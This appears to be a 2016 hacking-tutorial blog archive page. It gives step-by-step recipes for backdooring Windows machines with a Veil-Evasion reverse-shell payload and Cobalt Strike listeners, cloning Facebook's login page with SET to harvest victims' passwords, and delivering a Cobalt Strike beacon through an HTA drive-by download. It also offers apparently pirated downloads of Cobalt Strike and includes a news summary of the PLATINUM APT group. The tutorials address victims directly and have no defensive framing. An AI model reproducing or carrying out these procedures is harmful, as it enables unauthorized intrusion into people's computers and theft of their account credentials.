Home » Archive for April 2016

Hack Windows Using Public IP Cobaltstrike

1 Comment
Introduction About Cobaltstrike

CobaltStrike Emulation Tools is a collection of threats that work with Metasploit Framework. CobaltStrike to help you get a foothold in the network and secretly keep working. Tools post-exploitation CobaltStrike helps you show what you can do with the powerful tools of CobaltStrike.
CobaltStrike also produce professional reports at the end of your attack.
Many features of CobaltStrike that can work as a standalone tool with the workings of the Metasploit Framework CobaltStrike together, you will benefit from the smooth use of all the capabilities of the CobaltStrike together. As a bonus, CobaltStrike is a tool that is included in the GUI and along its Armitage. If you often use Armitage, and when you try CobaltStrike tools you will find differences with the use of Armitage.

 Download Free Cobaltstrike Zippyshare
Download Free Cobaltstrike 4Shared

Download Free Cobaltstrike Google Drive

 And now i will show you about hacking windows using Veil-Framework and Cobaltstrike. This method uses a backdoor created in Veil-Evasion using bat format.
Open Veil-Evasion

Show list available payload

Use powershell/meterpreter/rev_https

Use 23

Open your browser, and check your public Ip

Set LHOST <your public ip>

Set LPORT <4321>

Info

Generate

check payload.bat on your directory

Open cobaltstrike

Connect

Yes

Let Proccess running

Select Cobaltstrike > Listeners

Set Name : payload, Payload : windows/meterpreter/rev_https, Host : Your public Ip,  Port : 4321. save

Debug

Open payload.bat on victim machine

Meterpreter Session 1 opened

You succes on victim system. Check run VNC


Check Browser Files


Getsystem
Download Cobaltstrike full version.


Related Posts:

Platinum Hackers Hijack Windows Hotpatching To Stay Hidden

Add Comment

http://learninghacker16.blogspot.co.id/2016/04/platinum-hackers-hijack-windows.html

The Microsoft’s Windows Defender Advanced Threat Hunting team detected that a cyber espionage group of hackers, known as PLATINUM, has found a way to turn the Windows's Hotpatching technique (a way of updating the operating system without requiring a restart) to hide its malware from Antivirus products.

PLATINUM group has been active since 2009 and launching large-scale attacks against governmental organizations, intelligence agencies, defense institutes and telecommunication providers in South and Southeast Asia.
Practically speaking, the most important thing for a sophisticated APT hacker and a cyber-espionage group is to remain undetected for the longest possible period.

Well, that's exactly what an APT (Advanced Persistent Threat) group has achieved.

The Microsoft’s Windows Defender Advanced Threat Hunting team has discovered that an APT group, dubbed Platinum, has been spying on high-profile targets by abusing a "novel" technique called Hotpatching.
Introduced in Windows Server 2003, the Hotpatching feature allows Microsoft to upgrade applications or the operating system in the running system without having to reboot the computer by inserting the new, updated code into a server.

The Platinum hacking group has often used the spear-phishing technique to penetrate initially the targeted networks, used numerous zero-day vulnerabilities in attacks, and has taken many efforts to hide its attacks.

The latest report released by Microsoft said the Platinum group abused the Windows’ hotpatching feature, allowing it to inject malicious code into running processes without having to reboot the server and then later hide backdoors and other malware from installed antivirus solution.

"If the tool fails to inject code using hot patching, it reverts to attempting the other more common code injection techniques into common Windows processes, primarily targeting winlogon.exe, lsass.exe, and svchost.exe," Microsoft said in its report.

The hotpatching technique works against Windows Server 2003 Service Pack 1, Windows Server 2008, Windows Server 2008 R2, Windows Vista, and Windows 7. Platinum abused the technique in real-world attacks to hide its efforts from analysis.

The group has been using the Hotpatching technique to install the Dipsing, Adbupd and JPIN backdoors on networks belonging to governmental organizations, including defense organizations, intelligence agencies, diplomats and Internet Service Providers (ISPs) and then to steal sensitive data.

The goal of the attacks doesn’t appear to have been immediate financial gain; rather the Platinum APT group is up to a broader economic espionage campaign using stolen information.

The group has been targeting countries in South and Southeast Asia since at least 2009, with Malaysia being its biggest victim, following Indonesia, China, and India.
Though the Platinum group is still active, there is still a way for organizations and companies to avoid infection.

Microsoft's security experts explain that the hotpatching technique requires admin-level permissions, so the threat actors are sending spear-phishing emails that come with boobytrapped Office documents to infect each target.





 

Related Posts:

Social Engineering Toolkit Using Public IP Clone

3 Comments
Introduction Social Engineering toolkit

 Copyright 2016 The Social-Engineer Toolkit (SET)
Written by: David Kennedy (ReL1K)
Company: TrustedSec
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.
Please read the LICENSE under readme/LICENSE for the licensing of SET.

Features

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

Bugs and enhancements

For bug reports or enhancements, please open an issue here: https://github.com/trustedsec/social-engineer-toolkit/issues

Supported platforms

  • Linux
  • Mac OS X 

And now i will open discussion about using Social Engineering Toolkit with Public Ip Clone

Open Social Engineering Toolkit

press 1 (Social-Engineering Attack)

press 2 (Website Attack Vector)

press 3 (Credential Harvester Attack Method)

press 2 (Site Cloner)

Open your browser and open http://www.whatsmyip.org/ (Look you Public Ip)

Write your public ip on Harvester/Tabnabbing

In Enter  the url to clone :  www.facebook.com

You can look at /var/www/html to see the records from the result S.E.T. with name harvester

If someone opens your ip on the browser, though different ip. it will open the login page facebook


Write user and password

www.facebook.com

And you can open file harvester on your directory /var/www/html
You can found email and password victim

And congratulations. You get a user and password facebook.
If you have full access for your public ip, You can setting on your router for setting open port 80. And i can show you how setting port fordwarding on mikrotik.
open your router, select ip > firewall 

NAT

Press button +. chain : dstnat. dst_address : your public ip. protocol : 6(tcp). dst_port : 80


In Action Nat. Action : dst-nat. to address : your local ip. to ports : 80

Related Posts:

HTML Attack Using Cobaltstrike

Add Comment
Introduction Cobaltstrike

Cobalt-Strike relies on the Metasploit Framework. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Cobalt-Strike is a collection of threat emulation tools provided by Strategic Cyber LLC to work with the Metasploit Framework. Cobalt-Strike includes all features of Armitage and add post-exploitation tools, in addition to report generation features

Download  Cobaltstrike Full Version Google Drive
Download  Cobaltstrike Full Version Zippyshare
Download  Cobaltstrike Full Version 4Shared

In this tutorial i will show you about  HTML Attack Using Cobaltstrike.
Open Cobaltstrike

Connect

Yes

Waiting Open cobaltstrike

Attack > Packages > Windows Executable

Prees add. Set Name : beacon.html, Payload : windows/beacon_http/reverse_http, Host : your local ip, Port :4433. Save

Enter your local Ip

Generate

Select to your desktop, set file name : tes1.exe. save

OK

Attack > Packages > HTML-Application

Select tes1.exe on desktop. Then press open

Launch

Select to desktop, set file name : tes1.hta. save

OK

Select Attack > Web Drive-by > Host file

Select desktop, and select tes1.hta. Then Open

set File : root/Desktop/tes1.hta, url path : /tes1.hta, Local Port :4433, Mime type : automatic. then Launch

You can look a url, and if victim open a url, then you can access to victim. copy the url.

Open  mozilla on victim, and paste the url.

Save File

Run

View > beacons

Interact

Message

And create a message for a victim.

You have type help to beacon for show all a tools hacking
pwd

getsystem


Related Posts:

Subscribe to: Posts (Atom)